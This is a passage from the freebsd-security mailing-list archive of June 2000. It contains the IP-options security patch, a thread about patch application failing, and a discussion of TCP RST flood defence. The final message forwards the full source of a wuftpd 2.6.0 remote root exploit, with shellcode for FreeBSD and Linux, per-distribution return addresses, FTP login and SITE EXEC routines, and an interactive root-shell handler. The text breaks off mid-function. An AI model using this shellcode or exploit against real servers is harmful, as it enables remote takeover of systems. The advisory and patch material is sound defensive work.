-r1.130 ip_input.c --- ip_input.c 2000/02/23 20:11:57 1.130 +++ ip_input.c 2000/06/08 15:25:46 @@ -1067,8 +1067,12 @@ if (opt == IPOPT_NOP) optlen = 1; else { + if (cnt < IPOPT_OLEN + sizeof(*cp)) { + code = &cp[IPOPT_OLEN] - (u_char *)ip; + goto bad; + } optlen = cp[IPOPT_OLEN]; - if (optlen <= 0 || optlen > cnt) { + if (optlen < IPOPT_OLEN + sizeof(*cp) || optlen > cnt) { code = &cp[IPOPT_OLEN] - (u_char *)ip; goto bad; } @@ -1174,6 +1178,10 @@ break; case IPOPT_RR: + if (optlen < IPOPT_OFFSET + sizeof(*cp)) { + code = &cp[IPOPT_OFFSET] - (u_char *)ip; + goto bad; + } if ((off = cp[IPOPT_OFFSET]) < IPOPT_MINOFF) { code = &cp[IPOPT_OFFSET] - (u_char *)ip; goto bad; Index: ip_output.c =================================================================== RCS file: /ncvs/src/sys/netinet/ip_output.c,v retrieving revision 1.99 diff -u -r1.99 ip_output.c --- ip_output.c 2000/03/09 14:57:15 1.99 +++ ip_output.c 2000/06/08 15:27:08 @@ -1302,8 +1302,10 @@ if (opt == IPOPT_NOP) optlen = 1; else { + if (cnt < IPOPT_OLEN + sizeof(*cp)) + goto bad; optlen = cp[IPOPT_OLEN]; - if (optlen <= IPOPT_OLEN || optlen > cnt) + if (optlen < IPOPT_OLEN + sizeof(*cp) || optlen > cnt) goto bad; } switch (opt) { -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBOU3tLFUuHi5z0oilAQGR8AP/UbWPEYtE9Z5UAlesutOSp6UcHnl+6Gga nglpEBloBsf81J53nkLbf02rWQedb1BhROL1i+df9J328sCF/Tpci04bmdSAtiox EwDim4AlTjn4PqjlHyX1jf1mi0sMgxSuI5bBPuiVfsdYRbd96+AEbftfR9BuyqbB m6dFcBN5+y0= =A1Fk -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 22 15: 8:11 2000 Delivered-To: freebsd-security@freebsd.org Received: from testbed.baileylink.net (testbed.baileylink.net [63.71.213.24]) by hub.freebsd.org (Postfix) with ESMTP id 71FF737B6D3 for ; Thu, 22 Jun 2000 15:08:04 -0700 (PDT) (envelope-from brad@testbed.baileylink.net) Received: (from brad@localhost) by testbed.baileylink.net (8.9.3/8.9.3) id RAA12226 for freebsd-security@FreeBSD.ORG; Thu, 22 Jun 2000 17:08:31 -0500 (CDT) (envelope-from brad) Date: Thu, 22 Jun 2000 17:08:31 -0500 From: Brad Guillory To: freebsd-security@FreeBSD.ORG Subject: Re: How defend from stream2.c attack? Message-ID: <20000622170831.B9875@baileylink.net> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <000401bfdb64$3eae8320$0c3214d4@dragonland.tts.tomsk.su> <4.3.2.7.2.20000621125756.048b6d80@localhost> <200006220015.RAA05962@salsa.gv.tsc.tdk.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: <200006220015.RAA05962@salsa.gv.tsc.tdk.com>; from Don.Lewis@tsc.tdk.com on Wed, Jun 21, 2000 at 05:15:46PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, Jun 21, 2000 at 05:15:46PM -0700, Don Lewis wrote: [ Quote from Brett SNIPPED ] > Turning on the RST restriction makes it much easier to spoof TCP connections > that appear to come from your machine or to hijack established TCP > connections... Keep in mind that rate limiting RSTs will only give you a marginally better defence for this type of attack over no RSTs at all. All it would take to gag you is an ACK flood. BMG To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 22 15:38: 7 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 5662537B800; Thu, 22 Jun 2000 15:38:02 -0700 (PDT) (envelope-from kris@FreeBSD.org) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id PAA84550; Thu, 22 Jun 2000 15:38:02 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Thu, 22 Jun 2000 15:38:01 -0700 (PDT) From: Kris Kennaway To: George Hartz Cc: Tim McCullagh , Christiaan Rademan , freebsd-security@FreeBSD.ORG Subject: Re: Hi All. In-Reply-To: <001301bfdc35$3dbff170$0301a8c0@pentium> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 22 Jun 2000, George Hartz wrote: > One of the systems I use as a frewall is running 4.0 as well, and is doing > the same thing. It was on some hardware that I'd had some reliability > problems with in the past (bad DIMM), but two days ago I replaced the DIMM, > and was rather unhappy to discover yesterday that its still doing it. This is quite probably related to advisory 00:23, which I just released. Sorry for the delay on this one, it was intended to go out on Monday. Kris -- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 22 17: 2:12 2000 Delivered-To: freebsd-security@freebsd.org Received: from security1.noc.flyingcroc.net (security1.noc.flyingcroc.net [207.246.128.54]) by hub.freebsd.org (Postfix) with ESMTP id C91DC37BAC7 for ; Thu, 22 Jun 2000 17:01:59 -0700 (PDT) (envelope-from todd@flyingcroc.net) Received: from localhost (todd@localhost) by security1.noc.flyingcroc.net (8.9.3/8.9.3) with ESMTP id RAA84851 for ; Thu, 22 Jun 2000 17:01:06 -0700 (PDT) (envelope-from todd@flyingcroc.net) X-Authentication-Warning: security1.noc.flyingcroc.net: todd owned process doing -bs Date: Thu, 22 Jun 2000 17:01:06 -0700 (PDT) From: Todd Backman X-Sender: todd@security1.noc.flyingcroc.net To: security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-00:23.ip-options In-Reply-To: <20000622215052.D642E37BF12@hub.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org So, upon following the instructions for patch on the SA (including DL'ing the patch from the ftp site) I get the following: **** START **** stuff# patch -p < ip-options.diff Hmm... Looks like a unified diff to me... The text leading up to this was: -------------------------- |Index: ip_icmp.c |=================================================================== |RCS file: /ncvs/src/sys/netinet/ip_icmp.c,v |retrieving revision 1.39 |diff -u -r1.39 ip_icmp.c |--- ip_icmp.c 2000/01/28 06:13:09 1.39 |+++ ip_icmp.c 2000/06/08 15:26:39 -------------------------- Patching file ip_icmp.c using Plan A... Hunk #1 failed at 662. 1 out of 1 hunks failed--saving rejects to ip_icmp.c.rej Hmm... The next patch looks like a unified diff to me... The text leading up to this was: -------------------------- |Index: ip_input.c |=================================================================== |RCS file: /ncvs/src/sys/netinet/ip_input.c,v |retrieving revision 1.130 |diff -u -r1.130 ip_input.c |--- ip_input.c 2000/02/23 20:11:57 1.130 |+++ ip_input.c 2000/06/08 15:25:46 -------------------------- Patching file ip_input.c using Plan A... Hunk #1 failed at 1067. Hunk #2 failed at 1178. 2 out of 2 hunks failed--saving rejects to ip_input.c.rej Hmm... The next patch looks like a unified diff to me... The text leading up to this was: -------------------------- |Index: ip_output.c |=================================================================== |RCS file: /ncvs/src/sys/netinet/ip_output.c,v |retrieving revision 1.99 |diff -u -r1.99 ip_output.c |--- ip_output.c 2000/03/09 14:57:15 1.99 |+++ ip_output.c 2000/06/08 15:27:08 -------------------------- Patching file ip_output.c using Plan A... Hunk #1 failed at 1302. 1 out of 1 hunks failed--saving rejects to ip_output.c.rej done **** FINISH **** Can anyone hit me with the cluestick? Thanks. - Todd On Thu, 22 Jun 2000, FreeBSD Security Advisories wrote: > # cd /usr/src/sys/netinet > # patch -p < /path/to/patch_or_advisory > > Index: ip_icmp.c > =================================================================== > RCS file: /ncvs/src/sys/netinet/ip_icmp.c,v > retrieving revision 1.39 > diff -u -r1.39 ip_icmp.c > --- ip_icmp.c 2000/01/28 06:13:09 1.39 > +++ ip_icmp.c 2000/06/08 15:26:39 > @@ -662,8 +662,11 @@ > if (opt == IPOPT_NOP) > len = 1; > else { > + if (cnt < IPOPT_OLEN + sizeof(*cp)) > + break; > len = cp[IPOPT_OLEN]; > - if (len <= 0 || len > cnt) > + if (len < IPOPT_OLEN + sizeof(*cp) || > + len > cnt) > break; > } > /* > Index: ip_input.c > =================================================================== > RCS file: /ncvs/src/sys/netinet/ip_input.c,v > retrieving revision 1.130 > diff -u -r1.130 ip_input.c > --- ip_input.c 2000/02/23 20:11:57 1.130 > +++ ip_input.c 2000/06/08 15:25:46 > @@ -1067,8 +1067,12 @@ > if (opt == IPOPT_NOP) > optlen = 1; > else { > + if (cnt < IPOPT_OLEN + sizeof(*cp)) { > + code = &cp[IPOPT_OLEN] - (u_char *)ip; > + goto bad; > + } > optlen = cp[IPOPT_OLEN]; > - if (optlen <= 0 || optlen > cnt) { > + if (optlen < IPOPT_OLEN + sizeof(*cp) || optlen > cnt) { > code = &cp[IPOPT_OLEN] - (u_char *)ip; > goto bad; > } > @@ -1174,6 +1178,10 @@ > break; > > case IPOPT_RR: > + if (optlen < IPOPT_OFFSET + sizeof(*cp)) { > + code = &cp[IPOPT_OFFSET] - (u_char *)ip; > + goto bad; > + } > if ((off = cp[IPOPT_OFFSET]) < IPOPT_MINOFF) { > code = &cp[IPOPT_OFFSET] - (u_char *)ip; > goto bad; > Index: ip_output.c > =================================================================== > RCS file: /ncvs/src/sys/netinet/ip_output.c,v > retrieving revision 1.99 > diff -u -r1.99 ip_output.c > --- ip_output.c 2000/03/09 14:57:15 1.99 > +++ ip_output.c 2000/06/08 15:27:08 > @@ -1302,8 +1302,10 @@ > if (opt == IPOPT_NOP) > optlen = 1; > else { > + if (cnt < IPOPT_OLEN + sizeof(*cp)) > + goto bad; > optlen = cp[IPOPT_OLEN]; > - if (optlen <= IPOPT_OLEN || optlen > cnt) > + if (optlen < IPOPT_OLEN + sizeof(*cp) || optlen > cnt) > goto bad; > } > switch (opt) { > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 22 17:16:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from security1.noc.flyingcroc.net (security1.noc.flyingcroc.net [207.246.128.54]) by hub.freebsd.org (Postfix) with ESMTP id 1879337B67D for ; Thu, 22 Jun 2000 17:16:40 -0700 (PDT) (envelope-from todd@flyingcroc.net) Received: from localhost (todd@localhost) by security1.noc.flyingcroc.net (8.9.3/8.9.3) with ESMTP id RAA84965; Thu, 22 Jun 2000 17:16:06 -0700 (PDT) (envelope-from todd@flyingcroc.net) X-Authentication-Warning: security1.noc.flyingcroc.net: todd owned process doing -bs Date: Thu, 22 Jun 2000 17:16:06 -0700 (PDT) From: Todd Backman X-Sender: todd@security1.noc.flyingcroc.net To: Todd Backman Cc: security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-00:23.ip-options In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org After copying the patch from the SA, hacking out the cruft and running, it seems to work. The /pub/FreeBSD/CERT/patches/SA-00:23 does not work. Could it be due to the format of the patch on the ftp site? (just trying to figure things out here so I do not have a clue at a later date...) Thanks. - Todd On Thu, 22 Jun 2000, Todd Backman wrote: > > So, upon following the instructions for patch on the SA (including DL'ing > the patch from the ftp site) I get the following: > > **** START **** > > stuff# patch -p < ip-options.diff > Hmm... Looks like a unified diff to me... > The text leading up to this was: > -------------------------- > |Index: ip_icmp.c > |=================================================================== > |RCS file: /ncvs/src/sys/netinet/ip_icmp.c,v > |retrieving revision 1.39 > |diff -u -r1.39 ip_icmp.c > |--- ip_icmp.c 2000/01/28 06:13:09 1.39 > |+++ ip_icmp.c 2000/06/08 15:26:39 > -------------------------- > Patching file ip_icmp.c using Plan A... > Hunk #1 failed at 662. > 1 out of 1 hunks failed--saving rejects to ip_icmp.c.rej > Hmm... The next patch looks like a unified diff to me... > The text leading up to this was: > -------------------------- > |Index: ip_input.c > |=================================================================== > |RCS file: /ncvs/src/sys/netinet/ip_input.c,v > |retrieving revision 1.130 > |diff -u -r1.130 ip_input.c > |--- ip_input.c 2000/02/23 20:11:57 1.130 > |+++ ip_input.c 2000/06/08 15:25:46 > -------------------------- > Patching file ip_input.c using Plan A... > Hunk #1 failed at 1067. > Hunk #2 failed at 1178. > 2 out of 2 hunks failed--saving rejects to ip_input.c.rej > Hmm... The next patch looks like a unified diff to me... > The text leading up to this was: > -------------------------- > |Index: ip_output.c > |=================================================================== > |RCS file: /ncvs/src/sys/netinet/ip_output.c,v > |retrieving revision 1.99 > |diff -u -r1.99 ip_output.c > |--- ip_output.c 2000/03/09 14:57:15 1.99 > |+++ ip_output.c 2000/06/08 15:27:08 > -------------------------- > Patching file ip_output.c using Plan A... > Hunk #1 failed at 1302. > 1 out of 1 hunks failed--saving rejects to ip_output.c.rej > done > > **** FINISH **** > > Can anyone hit me with the cluestick? > > Thanks. > > - Todd > > > On Thu, 22 Jun 2000, FreeBSD Security Advisories wrote: > > > # cd /usr/src/sys/netinet > > # patch -p < /path/to/patch_or_advisory > > > > Index: ip_icmp.c > > =================================================================== > > RCS file: /ncvs/src/sys/netinet/ip_icmp.c,v > > retrieving revision 1.39 > > diff -u -r1.39 ip_icmp.c > > --- ip_icmp.c 2000/01/28 06:13:09 1.39 > > +++ ip_icmp.c 2000/06/08 15:26:39 > > @@ -662,8 +662,11 @@ > > if (opt == IPOPT_NOP) > > len = 1; > > else { > > + if (cnt < IPOPT_OLEN + sizeof(*cp)) > > + break; > > len = cp[IPOPT_OLEN]; > > - if (len <= 0 || len > cnt) > > + if (len < IPOPT_OLEN + sizeof(*cp) || > > + len > cnt) > > break; > > } > > /* > > Index: ip_input.c > > =================================================================== > > RCS file: /ncvs/src/sys/netinet/ip_input.c,v > > retrieving revision 1.130 > > diff -u -r1.130 ip_input.c > > --- ip_input.c 2000/02/23 20:11:57 1.130 > > +++ ip_input.c 2000/06/08 15:25:46 > > @@ -1067,8 +1067,12 @@ > > if (opt == IPOPT_NOP) > > optlen = 1; > > else { > > + if (cnt < IPOPT_OLEN + sizeof(*cp)) { > > + code = &cp[IPOPT_OLEN] - (u_char *)ip; > > + goto bad; > > + } > > optlen = cp[IPOPT_OLEN]; > > - if (optlen <= 0 || optlen > cnt) { > > + if (optlen < IPOPT_OLEN + sizeof(*cp) || optlen > cnt) { > > code = &cp[IPOPT_OLEN] - (u_char *)ip; > > goto bad; > > } > > @@ -1174,6 +1178,10 @@ > > break; > > > > case IPOPT_RR: > > + if (optlen < IPOPT_OFFSET + sizeof(*cp)) { > > + code = &cp[IPOPT_OFFSET] - (u_char *)ip; > > + goto bad; > > + } > > if ((off = cp[IPOPT_OFFSET]) < IPOPT_MINOFF) { > > code = &cp[IPOPT_OFFSET] - (u_char *)ip; > > goto bad; > > Index: ip_output.c > > =================================================================== > > RCS file: /ncvs/src/sys/netinet/ip_output.c,v > > retrieving revision 1.99 > > diff -u -r1.99 ip_output.c > > --- ip_output.c 2000/03/09 14:57:15 1.99 > > +++ ip_output.c 2000/06/08 15:27:08 > > @@ -1302,8 +1302,10 @@ > > if (opt == IPOPT_NOP) > > optlen = 1; > > else { > > + if (cnt < IPOPT_OLEN + sizeof(*cp)) > > + goto bad; > > optlen = cp[IPOPT_OLEN]; > > - if (optlen <= IPOPT_OLEN || optlen > cnt) > > + if (optlen < IPOPT_OLEN + sizeof(*cp) || optlen > cnt) > > goto bad; > > } > > switch (opt) { > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 22 17:24:25 2000 Delivered-To: freebsd-security@freebsd.org Received: from wat-border.sentex.ca (waterloo-hespler.sentex.ca [199.212.135.66]) by hub.freebsd.org (Postfix) with ESMTP id F368537BB2F; Thu, 22 Jun 2000 17:24:09 -0700 (PDT) (envelope-from mike@sentex.net) Received: from granite.sentex.net (granite-atm.sentex.ca [209.112.4.1]) by wat-border.sentex.ca (8.9.3/8.9.3) with ESMTP id UAA05667; Thu, 22 Jun 2000 20:24:09 -0400 (EDT) (envelope-from mike@sentex.net) Received: from chimp (cage.simianscience.com [64.7.134.1]) by granite.sentex.net (8.8.8/8.6.9) with ESMTP id UAA28373; Thu, 22 Jun 2000 20:24:06 -0400 (EDT) Message-Id: <4.2.2.20000622201823.0479a690@mail.sentex.net> X-Sender: mdtancsa@mail.sentex.net X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2 Date: Thu, 22 Jun 2000 20:19:51 -0400 To: freebsd-security@FreeBSD.org From: Mike Tancsa Subject: Fwd: WuFTPD: Providing *remote* root since at least1994 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org For those of you who missed it on Bugtraq :-( ---Mike >Approved-By: aleph1@SECURITYFOCUS.COM >Delivered-To: bugtraq@lists.securityfocus.com >Delivered-To: bugtraq@securityfocus.com >Date: Fri, 23 Jun 2000 00:06:18 +0400 >Reply-To: tf8 >Sender: Bugtraq List >From: tf8 >Subject: WuFTPD: Providing *remote* root since at least1994 >To: BUGTRAQ@SECURITYFOCUS.COM > >/* - wuftpd2600.c > * VERY PRIVATE VERSION. DO NOT DISTRIBUTE. 15-10-1999 > * > * WUFTPD 2.6.0 REMOTE ROOT EXPLOIT > * by tf8 > * > * *NOTE*: For ethical reasons, only an exploit for 2.6.0 will be > * released (2.6.0 is the most popular version nowadays), and it > * should suffice to proof this vulnerability concept. > * > * Site exec was never really *fixed* > * > * Greetz to portal (he is elite!#%$) and all #!security.is, glitch, DiGit, > * \x90, venglin, xz, MYT and lamagra. > * Also greetings go to the WU-FTPD development team for including this > * bug in ALL their versions. > * > * Fuck to wuuru (he is an idiot) > * > * Account is not required, anonymous access is enough :) > * > * BTW, exploit is broken to avoid kids usage ;) > * > * VERY PRIVATE VERSION. DO NOT DISTRIBUTE. 15-10-1999 > */ >#include >#include >#include >#include >#include >#include >#include >#include >#include >#include >#include >#include > >#ifdef __linux >#include >#endif > >#define MAKE_STR_FROM_RET(x) >((x)&0xff),(((x)&0xff00)>>8),(((x)&0xff0000)>>16),(((x)&0xff000000)>>24) >#define GREEN "\033[32m" >#define RED "\033[31m" >#define NORM "\033[0m" > >char infin_loop[]= /* for testing purposes */ > "\xEB\xFE"; > >char bsdcode[] = /* Lam3rZ chroot() code rewritten for FreeBSD by venglin */ > "\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xdb\x31\xc0\x43" > "\x43\x53\x4b\x53\x53\xb0\x5a\xcd\x80\xeb\x77\x5e\x31\xc0" > "\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\xff\x01\x53\x53\xb0" > "\x88\xcd\x80\x31\xc0\x8d\x5e\x01\x53\x53\xb0\x3d\xcd\x80" > "\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9" > "\x31\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80\xfe\xc9\x75" > "\xf1\x31\xc0\x88\x46\x09\x8d\x5e\x08\x53\x53\xb0\x3d\xcd" > "\x80\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46" > "\x07\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56" > "\x0c\x52\x51\x53\x53\xb0\x3b\xcd\x80\x31\xc0\x31\xdb\x53" > "\x53\xb0\x01\xcd\x80\xe8\x84\xff\xff\xff\xff\xff\xff\x30" > "\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e" > "\x67\x6c\x69\x6e"; > >char bsd_code_d[]= /* you should call it directly (no jump/call)*/ > "\xEB\xFE\xEB\x02\xEB\x05\xE8\xF9\xFF\xFF\xFF\x5C" > "\x8B\x74\x24\xFC\x31\xC9\xB1\x15\x01\xCE\xB1\x71\xB0\xEF" > "\x30\x06\x8D\x76\x01\xE2\xF9\xDE\x26\xDE\x2F\xBE\x5F\xF8" > "\xBF\x22\x6F\x5F\xB5\xEB\xB4\xBE\xBF\x22\x6F\x62\xB9\x14" > "\x87\x75\xED\xEF\xEF\xBD\x5F\x67\xBF\x22\x6F\x62\xB9\x11" > "\xBE\xBD\x5F\xEA\xBF\x22\x6F\x66\x2C\x62\xB9\x14\xBD\x5F" > "\xD2\xBF\x22\x6F\xBC\x5F\xE2\xBF\x22\x6F\x5C\x11\x62\xB9" > "\x12\x5F\xE3\xBD\xBF\x22\x6F\x11\x24\x9A\x1C\x62\xB9\x11" > "\xBD\x5F\xD2\xBF\x22\x6F\x62\x99\x12\x66\xA1\xEB\x62\xB9" > "\x17\x66\xF9\xB9\xB9\xBD\x5F\xD4\xBF\x22\x6F\xC0\x8D\x86" > "\x81\xC0\x9C\x87\xEF\xC1\xC1\xEF"; > >char linuxcode[]= /* Lam3rZ chroot() code */ > "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb" > "\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31" > "\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27" > "\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31" > "\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d" > "\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46" > "\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8" > "\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c" > "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0" > "\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff" > "\x30\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31"; > >#define MAX_FAILED 4 >#define MAX_MAGIC 100 >static int magic[MAX_MAGIC],magic_d[MAX_MAGIC]; >static char *magic_str=NULL; >int before_len=0; >char *target=NULL,*username="ftp",*password=NULL; >struct targets getit; > >struct targets { > int def; > char *os_descr, *shellcode; > int delay; > u_long pass_addr, addr_ret_addr; > int magic[MAX_MAGIC], magic_d[MAX_MAGIC],islinux; >}; > >struct targets targ[]={ > {0,"RedHat 6.2 (?) with wuftpd 2.6.0(1) from > rpm",linuxcode,2,0x8075b00-700,0xbfffb028,{0x87,3,1,2},{1,2,1,4},1}, > {0,"RedHat 6.2 (Zoot) with wuftpd 2.6.0(1) from > rpm",linuxcode,2,0x8075b00-700,0xbfffb038,{0x87,3,1,2},{1,2,1,4},1}, > {0,"SuSe 6.3 with wuftpd 2.6.0(1) from > rpm",linuxcode,2,0x8076cb0-400,0xbfffb018,{0x87,3,1,2},{1,2,1,4},1}, > {0,"SuSe 6.4 with wuftpd 2.6.0(1) from > rpm",linuxcode,2,0x8076920-400,0xbfffafec,{0x88,3,1,2},{1,2,1,4},1}, > {0,"RedHat 6.2 (Zoot) with wuftpd 2.6.0(1) from rpm > (test)",linuxcode,2,0x8075b00-700,0xbfffb070,{0x87,3,1,2},{1,2,1,4},1}, > > {0,"FreeBSD 3.4-STABLE with wuftpd 2.6.0(1) from > ports",bsdcode,10,0x80bb474-100, > 0xbfbfc164,{0x3b,2,4,1,0x44,2,1,2},{1,2,1,2,1,2,1,4},0}, > {1,"FreeBSD 3.4-STABLE with wuftpd 2.6.0(1) from > packages",bsdcode,2,0x806d5b0-500,0xbfbfc6bc, {0x84,1,2,1,2}, {1,3,2,1,4},0}, > {0,"FreeBSD 3.4-RELEASE with wuftpd 2.6.0(1) from > ports",bsdcode,2,0x80a4dec-400,0xbfbfc624, > {0x3B,2,1,0xe,0x40,1,2,1,2},{1,2,1,2,1,3,2,1,4},0}, > {0,"FreeBSD 4.0-RELEASE with wuftpd 2.6.0(1) from > packages",infin_loop,2,0x80706f0,0xbfbfe798,{0x88,2,1,2},{1,2,1,4},0}, > {0,NULL,NULL,0,0,0,{0},{0},0} >}; > >void usage(char*zu,int q){ >int i, n, padding; >fprintf(stderr,"Usage: %s -t [-l user/pass] [-s systype] [-o >offset] [-g] [-h] [-x]\n" >" [-m magic_str] [-r ret_addr] [-P padding] [-p pass_addr] [-M dir]\n" >"target : host with any wuftpd\nuser : anonymous user\n" >"dir : if not anonymous user, you need to have writable directory\n" >"magic_str : magic string (see exploit description)\n-g : enables >magic string digging\n" >"-x : enables test mode\npass_addr : pointer to setproctitle >argument\n" >"ret_addr : this is pointer to shellcode\nsystypes: \n",zu); > for(i=0;targ[i].os_descr!=NULL;i++){ > padding=0; > fprintf(stderr,"%s%2d - %s\n",targ[i].def?"*":" ",i,targ[i].os_descr); > if(q>1){ > fprintf(stderr," Magic ID: ["); > for(n=0;targ[i].magic[n]!=0;n++){ > if(targ[i].magic_d[n]==4) > padding=targ[i].magic[n]; > fprintf(stderr,"%02X,%02X",targ[i].magic[n],targ[i].magic_d[n]); > if(targ[i].magic[n+1]!=0) > fprintf(stderr,":"); > } > fprintf(stderr,"] Padding: %d\n",padding); > fflush(stderr); > } > } > exit(1); >} > >int connect_to_server(char*host){ > struct hostent *hp; > struct sockaddr_in cl; > int sock; > > if(host==NULL||*host==(char)0){ > fprintf(stderr,"Invalid hostname\n"); > exit(1); > } > if((cl.sin_addr.s_addr=inet_addr(host))==-1) { > if((hp=gethostbyname(host))==NULL) { > fprintf(stderr,"Cannot resolve %s\n",host); > exit(1); > } > memcpy((char*)&cl.sin_addr,(char*)hp->h_addr,sizeof(cl.sin_addr)); > } > if((sock=socket(PF_INET,SOCK_STREAM,IPPROTO_TCP))==-1){ > fprintf(stderr,"Error creating socket: %s\n",strerror(errno)); > exit(1); > } > cl.sin_family=PF_INET; > cl.sin_port=htons(21); > if(connect(sock,(struct sockaddr*)&cl,sizeof(cl))==-1){ > fprintf(stderr,"Cannot connect to %s: %s\n",host,strerror(errno)); > exit(1); > } > return sock; >} > >int ftp_recv(int sock,char*buf,int buf_size,int disc){ > int n=0; > char q; > > if(disc) while((n=recv(sock,&q,1,0))==1&&q!='\n'); > else { > (void)bzero(buf,buf_size); > n=recv(sock,buf,buf_size,0); > if(n<0){ > fprintf(stderr,"ftp_recv: recv failed\n"); > exit(1); > } > buf[n]=0; > } > return n; >} >int ftp_send(int sock,char*what,int size,int f,char*ans,int ans_size){ > int n; > n=send(sock,what,size,0); > if(n!=size){ > fprintf(stderr,"ftp_send: failed to send. expected %d, sent %d\n", size,n); > shutdown(sock,2); > close(sock); > exit(1); > } > if(f) > return ftp_recv(sock,ans,ans_size,0); > return 0; >} > >int ftp_siteexec(int sock,char*buff,int buff_len,int q,char*ans,int ans_len){ > ftp_send(sock,buff,buff_len,q,ans,ans_len); > if(strncmp(ans,"200-",4)==0) > ftp_recv(sock,NULL,0,1); > else > ftp_recv(sock,ans,ans_len,0); > > if(strncmp(ans,"200-",4)){ > fprintf(stderr,"Cannot find site exec response string\n"); > exit(1); > } > return 0; >} > >void ftp_login(int sock,char*u_name,char*u_pass) >{ > char buff[2048]; > printf("loggin into system..\n"); > snprintf(buff,2047,"USER %s\r\n", u_name); > ftp_send(sock, buff,strlen(buff),1,buff,2047); > printf(GREEN"USER %s\n"NORM"%s",u_name,buff); > snprintf(buff,2047,"PASS %s\r\n",u_pass); > printf(GREEN"PASS %s\n"NORM,*u_pass=='\x90'?"":u_pass); > ftp_send(sock,buff,strlen(buff),1,buff,2047); > while(strstr(buff,"230 ")==NULL){ > (void)bzero(buff,2048); > ftp_recv(sock,buff,2048,0); > } > printf("%s",buff); > return; >} > >void ftp_mkchdir(int sock,char*cd,char*new) >{ > char buff[2048]; > > sprintf(buff,"CWD %s\r\n",cd); > printf(GREEN"%s"NORM,buff); > ftp_send(sock,buff,strlen(buff),1,buff,2047); > printf("%s",buff); > sprintf(buff,"MKD %s\r\n",new); > ftp_send(sock,buff,strlen(buff),1,buff,2047); > printf(GREEN"MKD "NORM"\n%s",buff); > sprintf(buff,"CWD %s\r\n",new); > ftp_send(sock,buff,strlen(buff),1,buff,2047); > printf(GREEN"CWD "NORM"\n%s",buff); > return; >} >void process_possibly_rooted(int sock) >{ > fd_set fd_read; > char buff[1024], *cmd=getit.islinux?"/bin/uname > -a;/usr/bin/id;exit\n":"/usr/bin/uname -a;/usr/bin/id;exit\n"; > int n; > > FD_ZERO(&fd_read); > FD_SET(sock, &fd_read); > FD_SET(0, &fd_read); > send(sock, cmd, strlen(cmd), 0); > while(1) { > FD_SET(sock,&fd_read); > FD_SET(0,&fd_read); > if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break; > if( FD_ISSET(sock, &fd_read) ) { > if((n=recv(sock,buff,sizeof(buff),0))<0){ > fprintf(stderr, "EOF\n"); > exit(2); > } > if(write(1,buff,n)<0)break; > } > if ( FD_ISSET(0, &fd_read) ) { > if((n=read(0,buff,sizeof(buff)))<0){ > 